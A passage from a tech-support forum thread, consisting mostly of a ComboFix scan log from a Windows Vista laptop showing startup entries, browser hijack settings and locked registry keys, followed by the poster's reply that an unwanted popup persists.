    "Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
    "00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
    "QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
    "TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
    "DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
    "SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
    "APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
    "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
    "MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
    .
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "EnableUIADesktopToggle"= 0 (0x0)
    "EnableLinkedConnections"= 1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "aux1"=wdmaud.drv
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
    @="Service"
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
    backup=c:\windows\pss\Metacafe.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
    backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
    path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
    backupExtension=.Startup
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
    \HWSetup.exe hwSetUP [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
    2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
    2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
    2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
    2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
    2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
    2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
    2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
    2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
    2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
    2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
    2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
    2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
    2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
    2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
    2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
    2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
    2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
    2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
    2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
    2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
    2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
    2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
    "DisableMonitoring"=dword:00000001
    .
    R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
    .
    Contents of the 'Scheduled Tasks' folder
    .
    2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
    - c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
    .
    2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
    - c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
    .
    .
    ------- Supplementary Scan -------
    .
    uStart Page = hxxp://search.imesh.com/
    mStart Page = hxxp://home.sweetim.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    LSP: c:\windows\system32\wpclsp.dll
    TCP: DhcpNameServer = 192.168.1.1
    FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    .
    .
    **************************************************************************
    .
    catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2012-05-30 00:09
    Windows 6.0.6002 Service Pack 2 NTFS
    .
    scanning hidden processes ...
    .
    scanning hidden autostart entries ...
    .
    scanning hidden files ...
    .
    scan completed successfully
    hidden files: 0
    .
    **************************************************************************
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
    @Denied: (Read) (RestrictedCode)
    @Denied: (Read) (LocalSystem)
    @Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Read) (Administrators)
    @SACL=(02 0001)
    @Ace=(0x11) (1) (S-1-16-4096)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
    @SACL=(02 0001)
    "lastact"=dword:00003640
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
    @SACL=(02 0001)
    "srch_ebox"=dword:4785b178
    "srch_hlt"=dword:47854ece
    "clkstrm"=dword:4785b2dc
    "boo"=dword:4785b2dc
    "etpg70_21"=dword:47854ece
    "sst"=dword:47854ecf
    "mess"=dword:4785b2dc
    "mess_off"=dword:4785b2dc
    "yma"=dword:47854eda
    "mus"=dword:47854edb
    "wik"=dword:47854edb
    "vis_srch70"=dword:4785abea
    "cacheldr"=dword:4785b2dc
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
    @SACL=(02 0001)
    "srch"=dword:4785abec
    "vis_srch70"=dword:4785abec
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
    @SACL=(02 0001)
    "LastPoll_200"=dword:00041537
    "resfeed"=dword:00000002
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
    "InstallStarted"=dword:00000000
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
    "DisplayName"="jlGui 3.0"
    "DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
    "NoModify"=dword:00000001
    "NoRepair"=dword:00000001
    "Publisher"="Music Player for the Java(tm) Platform"
    "Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
    "URLInfoAbout"="http://www.javazoom.net"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "bgu0fw0tDZx8jtqEjccbDg==
    "=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
    96
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta]
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Owner)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Users)
    @SACL=
    "PerceivedType"="text"
    @="htafile"
    "Content Type"="application/hta"
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
    @="{eec97550-47a9-11cf-b952-00aa0051fe20}"
    .
    [HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    "MSCurrentCountry"=dword:000000b5
    .
    ------------------------ Other Running Processes ------------------------
    .
    c:\program files\Microsoft Security Client\MsMpEng.exe
    c:\windows\system32\Ati2evxx.exe
    c:\windows\system32\Ati2evxx.exe
    c:\windows\system32\agrsmsvc.exe
    c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
    c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    c:\windows\system32\rundll32.exe
    c:\windows\System32\tcpsvcs.exe
    c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
    c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    c:\windows\system32\TODDSrv.exe
    c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
    c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    c:\program files\TeamViewer\Version6\TeamViewer.exe
    c:\program files\Synaptics\SynTP\SynToshiba.exe
    c:\program files\iPod\bin\iPodService.exe
    c:\windows\system32\mshta.exe
    c:\program files\Synaptics\SynTP\SynTPHelper.exe
    c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
    c:\windows\system32\mshta.exe
    .
    **************************************************************************
    .
    Completion time: 2012-05-30 00:16:00 - machine was rebooted
    ComboFix-quarantined-files.txt 2012-05-30 04:15
    ComboFix2.txt 2012-05-29 18:01
    ComboFix3.txt 2012-05-29 02:55
    .
    Pre-Run: 29,436,858,368 bytes free
    Post-Run: 29,280,116,736 bytes free
    .
    - - End Of File - - 443FBEB5CCBB3C0435B8375034C71986
     
  15. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    the popup is still there not gone yet
     
  16. Sponsor

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 733,556 other people just like you!

Loading...
Thread Status:
Not open for further replies.

Short URL to this thread: https://techguy.org/1054362